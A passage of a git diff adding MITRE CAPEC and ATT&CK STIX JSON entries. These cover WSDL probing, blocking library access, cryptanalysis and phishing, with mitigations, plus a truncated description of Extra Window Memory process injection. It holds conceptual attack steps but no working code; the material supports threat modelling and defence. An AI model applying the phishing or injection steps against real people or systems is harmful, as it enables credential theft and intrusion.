exposed as web services.\n Because WSDL generation often is automated, enterprising adversaries can use WSDL to gain insight into the both public and private services. For example, an organization converting legacy application functionality to a web services framework may inadvertently pass interfaces not intended for public consumption to a WSDL generation tool. The result will be SOAP interfaces that give access to private methods.\n Another, more subtle WSDL attack occurs when an enterprising attacker uses naming conventions to guess the names of unpublished methods that may be available on the server. For example, a service that offers a stock quote and trading service may publish query methods such as requestStockQuote in its WSDL. However, similar unpublished methods may be available on the server but not listed in the WSDL, such as executeStockQuote. A persistent adversary with time and a library of words and phrases can cycle thru common naming conventions (get, set, update, modify, and so on) to discover unpublished application programming interfaces that open doors into private data and functionality.\n Source : \"Seven Steps to XML Mastery, Step 7: Ensure XML Security\", Frank Coyle. See reference section.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Scan for WSDL Documents: The adversary scans for WSDL documents. The WDSL document written in XML is like a handbook on how to communicate with the web services provided by the target host. It provides an open view of the application (function details, purpose, functional break down, entry points, message types, etc.). This is very useful information for the adversary.

Experiment

  1. Analyze WSDL files: An adversary will analyze the WSDL files and try to find potential weaknesses by sending messages matching the pattern described in the WSDL file. The adversary could run through all of the operations with different message request patterns until a breach is identified.

Exploit

  1. Craft malicious content: Once an adversary finds a potential weakness, they can craft malicious content to be sent to the system. For instance the adversary may try to submit special characters and observe how the system reacts to an invalid request. The message sent by the adversary may not be XML validated and cause unexpected behavior.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A client program connecting to a web service can read the WSDL to determine what functions are available on the server.", + "The target host exposes vulnerable functions within its WSDL interface." + ], + "x_capec_skills_required": { + "Low": "This attack can be as simple as reading WSDL and starting sending invalid request.", + "Medium": "This attack can be used to perform more sophisticated attacks (SQL injection, etc.)" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "It is important to protect WSDL file or provide limited access to it.", + "id": "course-of-action--2cfb5b02-2dbe-4bbb-93b6-d0829c53a835", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eca4d328-57ff-446e-ad42-ccc2cef859ec", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2cfb5b02-2dbe-4bbb-93b6-d0829c53a835", + "spec_version": "2.1", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Review the functions exposed by the WSDL interface (especially if you have used a tool to generate it). Make sure that none of them is vulnerable to injection.", + "id": "course-of-action--59dfec85-61f1-4800-8246-6586b0f18405", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c5539c8-19a6-45b2-bcb9-4fb404dc382b", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59dfec85-61f1-4800-8246-6586b0f18405", + "spec_version": "2.1", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the WSDL does not expose functions and APIs that were not intended to be exposed.", + "id": "course-of-action--60133447-62bd-43b7-a58c-27e99dacd061", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8b13c359-babb-4e00-bfc7-ea8f84451bfe", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--60133447-62bd-43b7-a58c-27e99dacd061", + "spec_version": "2.1", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pay attention to the function naming convention (within the WSDL interface). Easy to guess function name may be an entry point for attack.", + "id": "course-of-action--7744ac94-d428-48ef-9b81-ccac789d7e79", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7a99d577-7a8d-4c25-a919-00e88b344543", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7744ac94-d428-48ef-9b81-ccac789d7e79", + "spec_version": "2.1", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate the received messages against the WSDL Schema. Incomplete solution.", + "id": "course-of-action--36790523-1c9a-42c0-97ff-726d74a27ad4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e8c83203-1d4b-4007-9bfc-d9e5e4cd1040", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36790523-1c9a-42c0-97ff-726d74a27ad4", + "spec_version": "2.1", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. It is possible that the application does not handle situations properly where access to these libraries has been blocked. Depending on the error handling within the application, blocked access to libraries may leave the system in an insecure state that could be leveraged by an attacker.", + "external_references": [ + { + "external_id": "CAPEC-96", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-589", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/589.html" + } + ], + "id": "attack-pattern--807e5b36-9da9-4be8-9f6e-5d8c7258cff5", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Block Access to Libraries", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Alter Execution Logic" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A web-based system uses a third party cryptographic random number generation library that derives entropy from machine's hardware. This library is used in generation of user session ids used by the application. If the library is inaccessible, the application instead uses a software based weak pseudo random number generation library. An attacker of the system blocks access of the application to the third party cryptographic random number generation library (by renaming it). The application in turn uses the weak pseudo random number generation library to generate session ids that are predictable. An attacker then leverages this weakness to guess a session id of another user to perform a horizontal elevation of privilege escalation and gain access to another user's account." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine what external libraries the application accesses.

Experiment

  1. Block access to the external libraries accessed by the application.

  2. Monitor the behavior of the system to see if it goes into an insecure/inconsistent state.

  3. If the system does go into an insecure/inconsistent state, leverage that to obtain information about the system functionality or data, elevate access control, etc. The rest of this attack will depend on the context and the desired goal.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An application requires access to external libraries.", + "An attacker has the privileges to block application access to external libraries." + ], + "x_capec_skills_required": { + "Low": "Knowledge of how to block access to libraries, as well as knowledge of how to leverage the resulting state of the application based on the failed call." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that application handles situations where access to APIs in external libraries is not available securely. If the application cannot continue its execution safely it should fail in a consistent and secure fashion.", + "id": "course-of-action--e537380d-e149-4eca-9d47-bb2f507a166b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-96-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--348327f8-a11a-4875-acca-449bc953ceb1", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e537380d-e149-4eca-9d47-bb2f507a166b", + "spec_version": "2.1", + "target_ref": "attack-pattern--807e5b36-9da9-4be8-9f6e-5d8c7258cff5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Cryptanalysis is a process of finding weaknesses in cryptographic algorithms and using these weaknesses to decipher the ciphertext without knowing the secret key (instance deduction). Sometimes the weakness is not in the cryptographic algorithm itself, but rather in how it is applied that makes cryptanalysis successful. An attacker may have other goals as well, such as: Total Break (finding the secret key), Global Deduction (finding a functionally equivalent algorithm for encryption and decryption that does not require knowledge of the secret key), Information Deduction (gaining some information about plaintexts or ciphertexts that was not previously known) and Distinguishing Algorithm (the attacker has the ability to distinguish the output of the encryption (ciphertext) from a random permutation of bits).", + "external_references": [ + { + "external_id": "CAPEC-97", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/97.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-1204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1204.html" + }, + { + "external_id": "CWE-1240", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1240.html" + }, + { + "external_id": "CWE-1241", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1241.html" + }, + { + "external_id": "CWE-1279", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1279.html" + }, + { + "description": "Cryptanalysis", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cryptanalysis" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-556", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Cryptanalysis" + } + ], + "id": "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cryptanalysis", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f" + ], + "x_capec_child_of_refs": [ + "attack-pattern--30b081a0-bf20-432b-8211-a340bbd04731" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (In most cases, if cryptanalysis is successful at all, an adversary will not be able to decrypt the entire message, but instead will only be able to deduce some information about the plaintext. However, that may be sufficient for an adversary, depending on the context of the attack.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_example_instances": [ + "A very easy to understand example is a cryptanalysis technique called frequency analysis that can be successfully applied to the very basic classic encryption algorithms that performed mono-alphabetic substitution replacing each letter in the plaintext with its predetermined mapping letter from the same alphabet. This was considered an improvement over a more basic technique that would simply shift all of the letters of the plaintext by some constant number of positions and replace the original letters with the new letter with the resultant alphabet position. While mono-alphabetic substitution ciphers are resilient to blind brute force, they can be broken easily with nothing more than a pen and paper. Frequency analysis uses the fact that natural language is not random and mono-alphabetic substitution does not hide the statistical properties of the natural language. So if the letter \"E\" in an English language occurs with a certain known frequency (about 12.7%), whatever \"E\" was substituted with to get to the ciphertext, will occur with the similar frequency. Having this frequency information allows the cryptanalyst to quickly determine the substitutions and decipher the ciphertext. Frequency analysis techniques are not applicable to modern ciphers as they are all resilient to it (unless this is a very bad case of a homegrown encryption algorithm). This example is inapplicable to modern cryptographic ciphers but is here to illustrate a rudimentary example of cryptanalysis." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. An attacker discovers a weakness in the cryptographic algorithm or a weakness in how it was applied to a particular chunk of plaintext.

Exploit

  1. An attacker leverages the discovered weakness to decrypt, partially decrypt or infer some information about the contents of the encrypted message. All of that is done without knowing the secret key.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--63048cb5-6d42-4fa2-a0e1-eeff2ef2a34d", + "attack-pattern--9dded599-dd66-4a4c-8f17-6afb81c234f8" + ], + "x_capec_prerequisites": [ + "The target software utilizes some sort of cryptographic algorithm.", + "An underlying weaknesses exists either in the cryptographic algorithm used or in the way that it was applied to a particular chunk of plaintext.", + "The encryption algorithm is known to the attacker.", + "An attacker has access to the ciphertext." + ], + "x_capec_resources_required": [ + "Computing resource requirements will vary based on the complexity of a given cryptanalysis technique. Access to the encryption/decryption routines of the algorithm is also required." + ], + "x_capec_skills_required": { + "High": "Cryptanalysis generally requires a very significant level of understanding of mathematics and computation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use proven cryptographic algorithms with recommended key sizes.", + "id": "course-of-action--722bfc5b-c0b1-457d-aa1b-4918cf8f3974", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-97-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--abc4a679-2285-4f45-82cd-1109211ab070", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--722bfc5b-c0b1-457d-aa1b-4918cf8f3974", + "spec_version": "2.1", + "target_ref": "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Ensure that the algorithms are used properly. That means:\n \n 1. Not rolling out your own crypto; Use proven algorithms and implementations.\n 2. Choosing initialization vectors with sufficiently random numbers\n 3. Generating key material using good sources of randomness and avoiding known weak keys\n 4. Using proven protocols and their implementations.\n 5. Picking the most appropriate cryptographic algorithm for your usage context and data\n \n ", + "id": "course-of-action--fa27b1a5-bd89-4f29-ba4b-288f3f7cd461", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-97-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56815f59-a73c-4405-9d0b-994baee3c08c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fa27b1a5-bd89-4f29-ba4b-288f3f7cd461", + "spec_version": "2.1", + "target_ref": "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Phishing is a social engineering technique where an attacker masquerades as a legitimate entity with which the victim might do business in order to prompt the user to reveal some confidential information (very frequently authentication credentials) that can later be used by an attacker. Phishing is essentially a form of information gathering or \"fishing\" for information.", + "external_references": [ + { + "external_id": "CAPEC-98", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/98.html" + }, + { + "external_id": "CWE-451", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/451.html" + }, + { + "description": "Phishing", + "external_id": "T1566", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1566" + }, + { + "description": "Phishing for Information", + "external_id": "T1598", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1598" + }, + { + "description": "Wireless Security - Bluejack a Victim, TutorialsPoint", + "external_id": "REF-656", + "source_name": "reference_from_CAPEC", + "url": "https://www.tutorialspoint.com/wireless_security/wireless_security_bluejack_a_victim.htm" + } + ], + "id": "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Phishing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067", + "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501" + ], + "x_capec_child_of_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "The target gets an official looking e-mail from their bank stating that their account has been temporarily locked due to suspected unauthorized activity and that they need to click on the link included in the e-mail to log in to their bank account in order to unlock it. The link in the e-mail looks very similar to that of their bank and once the link is clicked, the log in page is the exact replica. The target supplies their login credentials after which they are notified that their account has now been unlocked and that everything is fine. An attacker has just collected the target's online banking information which can now be used by the attacker to log into the target's bank account and transfer money to a bank account of the attackers' choice.", + "An adversary may use BlueJacking, or Bluetooth Phishing to send unsolicited contact cards, messages, or pictures to nearby devices that are listening via Bluetooth. These messages may contain phishing content." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Obtain domain name and certificate to spoof legitimate site: This optional step can be used to help the attacker impersonate the legitimate site more convincingly. The attacker can use homograph attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate.

    2. Techniques
    Optionally obtain a domain name that visually looks similar to the legitimate site's domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L)
    Optionally obtain a legitimate SSL certificate for the new domain name.

  2. Explore legitimate website and create duplicate: An attacker creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that they are trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here.

    3. Techniques
    Use spidering software to get copy of web pages on legitimate site.
    Manually save copies of required web pages from legitimate site.
    Create new web pages that have the legitimate site's look and feel, but contain completely new content.

Exploit

  1. Convince user to enter sensitive information on attacker's site.: An attacker sends an e-mail to the victim that has some sort of a call to action to get the user to click on the link included in the e-mail (which takes the victim to attacker's website) and log in. The key is to get the victim to believe that the e-mail is coming from a legitimate entity with which the victim does business and that the website pointed to by the URL in the e-mail is the legitimate website. A call to action will usually need to sound legitimate and urgent enough to prompt action from the user.

    2. Techniques
    Send the user a message from a spoofed legitimate-looking e-mail address that asks the user to click on the included link.
    Place phishing link in post to online forum.

  2. Use stolen credentials to log into legitimate site: Once the attacker captures some sensitive information through phishing (login credentials, credit card information, etc.) the attacker can leverage this information. For instance, the attacker can use the victim's login credentials to log into their bank account and transfer money to an account of their choice.

    3. Techniques
    Log in to the legitimate site using another user's supplied credentials
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1", + "attack-pattern--614cd894-0aa6-4031-88e1-89bd7b6118bb", + "attack-pattern--ec0a802f-1d0a-4360-a4d8-3fb9f48715d0" + ], + "x_capec_prerequisites": [ + "An attacker needs to have a way to initiate contact with the victim. Typically that will happen through e-mail.", + "An attacker needs to correctly guess the entity with which the victim does business and impersonate it. Most of the time phishers just use the most popular banks/services and send out their \"hooks\" to many potential victims.", + "An attacker needs to have a sufficiently compelling call to action to prompt the user to take action.", + "The replicated website needs to look extremely similar to the original website and the URL used to get to that website needs to look like the real URL of the said business entity." + ], + "x_capec_resources_required": [ + "Some web development tools to put up a fake website." + ], + "x_capec_skills_required": { + "Medium": "Basic knowledge about websites: obtaining them, designing and implementing them, etc." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0c786816-7b0c-4fe7-b657-7e339aea5498", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8cee0cf-4567-40f0-a8d6-0b1d71c03c27", + "spec_version": "2.1", + "target_ref": "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-230: XML Nested Payloads and CAPEC-231: XML Oversized Payloads. Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-99", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/99.html" + } + ], + "id": "attack-pattern--28be41f9-7246-4484-869d-f0e2e82690ee", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: XML Parser Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298.json new file mode 100644 index 0000000000000000000000000000000000000000..75417f214ae04bc03bd5f9ca2bfc027e795146de --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298.json @@ -0,0 +1,88 @@ +{ + "type": "bundle", + "id": "bundle--523a330b-0eba-42b3-93ab-f78c4e2d90b9", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", + "type": "attack-pattern", + "created": "2020-01-14T17:18:32.126Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1055.011", + "url": "https://attack.mitre.org/techniques/T1055/011" + }, + { + "url": "https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx", + "description": "Microsoft. (n.d.). About Window Classes. Retrieved December 16, 2017.", + "source_name": "Microsoft Window Classes" + }, + { + "url": "https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx", + "description": "Microsoft. (n.d.). GetWindowLong function. Retrieved December 16, 2017.", + "source_name": "Microsoft GetWindowLong function" + }, + { + "url": "https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx", + "description": "Microsoft. (n.d.). SetWindowLong function. Retrieved December 16, 2017.", + "source_name": "Microsoft SetWindowLong function" + }, + { + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "source_name": "Elastic Process Injection July 2017" + }, + { + "url": "https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html", + "description": "MalwareTech. (2013, August 13). PowerLoader Injection \u2013 Something truly amazing. Retrieved December 16, 2017.", + "source_name": "MalwareTech Power Loader Aug 2013" + }, + { + "url": "https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/", + "description": "Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017.", + "source_name": "WeLiveSecurity Gapz and Redyms Mar 2013" + }, + { + "url": "https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx", + "description": "Microsoft. (n.d.). SendNotifyMessage function. Retrieved December 16, 2017.", + "source_name": "Microsoft SendNotifyMessage function" + } + ], + "modified": "2020-11-10T18:29:31.004Z", + "name": "Extra Window Memory Injection", + "description": "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. \n\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process\u2019s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process\u2019s EWM.\n\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. 